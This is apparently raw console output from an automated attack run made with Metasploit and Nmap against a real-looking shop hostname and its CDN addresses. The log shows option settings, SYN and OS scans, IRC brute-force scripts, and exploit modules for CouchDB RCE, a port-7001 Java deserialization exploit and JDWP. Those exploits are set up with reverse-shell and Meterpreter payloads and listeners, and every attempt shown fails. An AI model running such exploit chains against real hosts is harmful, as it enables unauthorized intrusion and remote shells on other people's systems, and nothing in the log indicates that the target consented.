[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 151.101.66.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-] /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42:200::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42:400::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42:600::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:36)x•
RUNNING APACHE COUCHDB RCE EXPLOIT
====================================================================================•x[2022-02-21](15:36)x•
[*] Using configured payload linux/x64/shell_reverse_tcp
RHOSTS => guestmob.myspreadshop.com
RPORT => 5984
LHOST => 127.0.0.1
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.
[*] Exploiting target 151.101.194.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 151.101.2.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 151.101.66.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 151.101.130.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 2a04:4e42:200::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploiting target 2a04:4e42:400::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploiting target 2a04:4e42:600::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploiting target 2a04:4e42::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploit completed, but no session was created.
+ -- --=[Port 6000 closed... skipping.
+ -- --=[Port 6667 opened... running tests...
====================================================================================•x[2022-02-21](15:37)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:37)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:37 EST
NSE: Loaded 51 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:37
Completed Parallel DNS resolution of 1 host. at 15:37, 0.08s elapsed
Initiating SYN Stealth Scan at 15:37
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 6667/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:37, 0.13s elapsed (1 total ports)
Initiating Service scan at 15:37
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:40, 168.38s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:40
Completed Traceroute at 15:40, 0.11s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:40
Completed Parallel DNS resolution of 1 host. at 15:40, 0.06s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:40
Completed NSE at 15:41, 30.66s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 1.74s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.083s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
6667/tcp open irc?
|_irc-sasl-brute: ERROR: Script execution failed (use -d to debug)
|_irc-brute: ERROR: Script execution failed (use -d to debug)
|_irc-info: Unable to open connection
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.879 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 6667/tcp)
HOP RTT ADDRESS
1 102.12 ms 151.101.2.137
NSE: Script Post-scanning.
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.53 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 36 (2.284KB)
====================================================================================•x[2022-02-21](15:41)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:41)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.194.137
[-] 151.101.194.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.2.137
[-] 151.101.2.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.66.137
[-] 151.101.66.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.130.137
[-] 151.101.130.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
+ -- --=[Port 7001 opened... running tests...
====================================================================================•x[2022-02-21](15:41)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:41)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:41 EST
NSE: Loaded 46 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating Ping Scan at 15:41
Scanning guestmob.myspreadshop.com (151.101.66.137) [4 ports]
Completed Ping Scan at 15:41, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:41
Completed Parallel DNS resolution of 1 host. at 15:41, 0.07s elapsed
Initiating SYN Stealth Scan at 15:41
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 7001/tcp on 151.101.66.137
Completed SYN Stealth Scan at 15:41, 0.09s elapsed (1 total ports)
Initiating Service scan at 15:41
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 15:44, 158.60s elapsed (1 service on 1 host)
NSE: Script scanning 151.101.66.137.
Initiating NSE at 15:44
Completed NSE at 15:44, 7.23s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 1.48s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649
PORT STATE SERVICE VERSION
7001/tcp open afs3-callback?
NSE: Script Post-scanning.
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.29 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
====================================================================================•x[2022-02-21](15:44)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:44)x•
[*] No payload configured, defaulting to cmd/windows/powershell_reverse_tcp
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Exploit completed, but no session was created.
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
RPORT => 7001
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.194.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.194.137:7001) timed out.
[!] 151.101.194.137:7001 - This exploit may require manual cleanup of '/tmp/OldyIJz.jar' on the target
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.2.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.2.137:7001) timed out.
[!] 151.101.2.137:7001 - This exploit may require manual cleanup of '/tmp/UURlSZ.jar' on the target
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.66.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.66.137:7001) timed out.
[!] 151.101.66.137:7001 - This exploit may require manual cleanup of '/tmp/mpzx.jar' on the target
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.130.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.130.137:7001) timed out.
[!] 151.101.130.137:7001 - This exploit may require manual cleanup of '/tmp/GejD.jar' on the target
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42:200::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:200::649]:7001) was unreachable.
[!] 2a04:4e42:200::649:7001 - This exploit may require manual cleanup of '/tmp/LYxpD.jar' on the target
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42:400::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:400::649]:7001) was unreachable.
[!] 2a04:4e42:400::649:7001 - This exploit may require manual cleanup of '/tmp/CGOC.jar' on the target
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42:600::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:600::649]:7001) was unreachable.
[!] 2a04:4e42:600::649:7001 - This exploit may require manual cleanup of '/tmp/KbGlwn.jar' on the target
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42::649]:7001) was unreachable.
[!] 2a04:4e42::649:7001 - This exploit may require manual cleanup of '/tmp/UfDIP.jar' on the target
[*] Exploit completed, but no session was created.
+ -- --=[Port 8000 opened... running tests...
====================================================================================•x[2022-02-21](15:46)x•
RUNNING JAVA JDWP DEBUG EXPLOIT
====================================================================================•x[2022-02-21](15:46)x•
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
RHOSTS => guestmob.myspreadshop.com
RPORT => 8000
SSL => false
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.130.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.194.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.2.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 151.101.66.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42:200::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:200::649]:8000) was unreachable.
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42:400::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:400::649]:8000) was unreachable.
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42:600::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:600::649]:8000) was unreachable.
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[-] 2a04:4e42::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42::649]:8000) was unreachable.
[*] Exploit completed, but no session was created.
+ -- --=[Port 8001 opened... running tests...
====================================================================================•x[2022-02-21](15:47)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:47)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:47 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:47
Completed Parallel DNS resolution of 1 host. at 15:47, 0.22s elapsed
Initiating SYN Stealth Scan at 15:47
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 8001/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:47, 0.10s elapsed (1 total ports)
Initiating Service scan at 15:47
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:50, 158.95s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:50
Completed Traceroute at 15:50, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:50
Completed Parallel DNS resolution of 1 host. at 15:50, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:50
Completed NSE at 15:50, 0.01s elapsed
Initiating NSE at 15:50
Completed NSE at 15:50, 1.10s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.14s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
8001/tcp open vcom-tunnel?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), Linux 5.0 - 5.3 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.534 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 8001/tcp)
HOP RTT ADDRESS
1 166.55 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 15:50
Completed NSE at 15:50, 0.00s elapsed
Initiating NSE at 15:50
Completed NSE at 15:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.14 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 41 (2.683KB)
====================================================================================•x[2022-02-21](15:50)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:50)x•
RHOST => guestmob.myspreadshop.com
RPORT => 8001
[*] Running module against 151.101.2.137
[*] 151.101.2.137:8001 - Sending RMI Header...
[-] 151.101.2.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 151.101.66.137
[*] 151.101.66.137:8001 - Sending RMI Header...
[-] 151.101.66.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 151.101.130.137
[*] 151.101.130.137:8001 - Sending RMI Header...
[-] 151.101.130.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 151.101.194.137
[*] 151.101.194.137:8001 - Sending RMI Header...
[-] 151.101.194.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 2a04:4e42:400::649
[*] 2a04:4e42:400::649:8001 - Sending RMI Header...
[-] 2a04:4e42:400::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:400::649]:8001) was unreachable.
[-] 2a04:4e42:400::649:8001 - Call stack:
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:400::649:8001 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:600::649
[*] 2a04:4e42:600::649:8001 - Sending RMI Header...
[-] 2a04:4e42:600::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:600::649]:8001) was unreachable.
[-] 2a04:4e42:600::649:8001 - Call stack:
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:600::649:8001 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42::649
[*] 2a04:4e42::649:8001 - Sending RMI Header...
[-] 2a04:4e42::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42::649]:8001) was unreachable.
[-] 2a04:4e42::649:8001 - Call stack:
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42::649:8001 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:200::649
[*] 2a04:4e42:200::649:8001 - Sending RMI Header...
[-] 2a04:4e42:200::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:200::649]:8001) was unreachable.
[-] 2a04:4e42:200::649:8001 - Call stack:
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:200::649:8001 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Auxiliary module execution completed
RHOST => guestmob.myspreadshop.com
[-] 151.101.2.137:1099 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.66.137:1099 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.130.137:1099 - Failed to negotiate RMI protocol
